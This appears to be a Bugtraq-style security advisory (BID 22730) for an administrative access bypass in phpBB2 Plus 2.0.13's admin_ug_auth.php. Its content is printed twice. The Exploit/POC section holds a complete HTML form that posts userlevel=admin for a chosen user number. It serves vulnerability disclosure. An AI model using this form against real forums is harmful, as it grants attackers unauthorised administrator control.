PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
BID:22730
Info
PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
| Bugtraq ID: | 22730 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 26 2007 12:00AM |
| Updated: | Feb 26 2007 11:06PM |
| Credit: | Hasadya Raed is credited with discovering this issue. |
| Vulnerable: |
phpBB2 phpBB2 Plus 2.0.13 |
| Not Vulnerable: | |
Discussion
PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.
Successful exploits may result in a complete compromise of vulnerable applications.
PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.
Successful exploits may result in a complete compromise of vulnerable applications.
Exploit / POC
PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
Attackers can exploit this issue via a browser.
The following exploit POST request is available:
<html>
<head>
</head>
<body>
<form method="post"
action="www.example.com/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Attackers can exploit this issue via a browser.
The following exploit POST request is available:
<html>
<head>
</head>
<body>
<form method="post"
action="www.example.com/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Solution / Fix
PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
References:
References:
- phpBB Homepage (phpBB Group)